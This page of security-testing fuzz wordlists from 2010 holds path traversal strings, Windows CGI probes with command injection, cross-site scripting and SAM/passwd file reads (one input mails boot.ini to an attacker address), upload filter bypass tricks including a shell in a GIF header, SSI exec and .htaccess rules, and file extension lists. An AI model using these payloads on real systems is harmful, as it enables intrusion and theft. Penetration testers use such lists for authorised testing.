.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
